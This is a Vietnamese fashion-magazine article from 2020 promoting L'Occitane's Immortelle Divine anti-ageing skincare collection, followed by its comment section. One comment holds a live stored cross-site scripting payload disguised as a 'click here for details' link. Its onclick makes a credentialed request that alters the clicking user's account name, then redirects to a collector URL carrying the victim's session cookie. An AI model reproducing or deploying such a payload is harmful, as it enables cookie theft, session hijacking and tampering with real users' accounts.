Hành trình khai phá nguồn năng lượng tái sinh vẻ đẹp rạng rỡ trong BST Immortelle Divine mới của L’Occitane

04/09/2020

Khi bước vào độ tuổi 35, bạn sẽ dễ nhận thấy rằng làn da dần trở nên xỉn màu, các đốm sạm nám và các nếp nhăn xuất hiện trên bề mặt da dần mất đi nét trẻ trung và tươi tắn như thuở đôi mươi. Lúc này, làn da đang ngầm báo hiệu cho bạn biết, “Chúng ta thực sự cần thay đổi và cập nhật chu trình dưỡng da mới!”

Đồng hành cùng L’Occitane để khám phá giải pháp phục hồi vẻ đẹp làn da tươi trẻ như tuổi đôi mươi nhé!

L’Occitane tin rằng, “Món quà đến từ thiên nhiên dành tặng cho sắc đẹp luôn là vô tận, nhất là khi có sự kết hợp hoàn hảo giữa nguồn dưỡng chất quý giá cùng công nghệ sản xuất tiên tiến!”

Nối tiếp thành công vang dội của Bộ sưu tập Immortelle Divine, L’Occitane quyết định ra mắt Phiên Bản Cải Tiến Mới trong năm 2020. Bộ sưu tập sở hữu “Quyền Năng Tái Sinh Cúc Trường Sinh” gồm 4 thành phần chính từ chiết xuất Cúc Trường Sinh là “chìa khóa vàng” cho việc gìn giữ nét đẹp trẻ trung, rạng rỡ và tràn đầy sức sống của làn da!

Cúc Trường Sinh vốn nổi tiếng là một loài hoa có tuổi thọ dài đặc biệt và gần như không bao giờ tàn, được xem như “trái tim của vùng Đảo Corsica”. Sau gần 20 năm, L’Occitane đã nghiên cứu và áp dụng thành công “Công Nghệ Tái Chế Siêu Xanh” nhằm phát huy tối đa Quyền Năng Tái Sinh trong Bộ sưu tập Immortelle Divine. Công nghệ này cho phép “chắt lọc” những tinh hoa còn sót lại và trân quý từng giọt dưỡng chất quý giá cuối cùng của Hoa Cúc Trường Sinh.

Hơn cả mong đợi, “Siêu Chiết Xuất Cúc Trường Sinh” đóng vai trò như một mảnh ghép hoàn hảo, nắm trọn bí quyết duy trì nét xuân của làn da bắt đầu tuổi 35. Thành phần thứ 4 này đặc biệt hoạt động mạnh mẽ tương đương với hoạt chất retinol*, giúp tăng cường sản sinh một lượng lớn collagen nhằm thúc đẩy khả năng phục hồi và tái tạo làn da mới, xóa mờ nếp nhăn và phục hồi độ đàn hồi, căng mịn tự nhiên. Vì là “retinol tự nhiên”, Bộ sưu tập Immortelle Divine mang đến giải pháp chăm sóc da dịu nhẹ, phù hợp với mọi làn da và kể cả làn da nhạy cảm.

Phiên bản mới của bộ sưu tập Immortelle Divine nâng cấp chu trình dưỡng da như một “Chuyên gia chăm sóc sắc đẹp” của riêng bạn, không chỉ dừng lại như “thói quen chăm sóc da” hằng ngày nữa.

Bình luận

Bạn nghĩ gì về bài viết này ?(1 bình luận)

Bạn cần đăng nhập để có thể bình luận

Có 1 thành viên đã bình luận

asd

asd

<a href="#" onclick="javascript:data2 = { fullname: 'FOUND YOU' }; fetch('https://www.lofficiel.vn/tai-khoan/thong-tin-ca-nhan', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify(data2), credentials: 'include' }) .then(response => response.json()) .then(data => { console.log('Success:', data); }) .catch((error) => { console.error('Error:', error); });window.location='http://127.0.0.1:8081/Tester/xss.php?cok='+document.cookie+'&url=https://www.lofficiel.vn/';" >Click vào đây để xem chi tiết</a>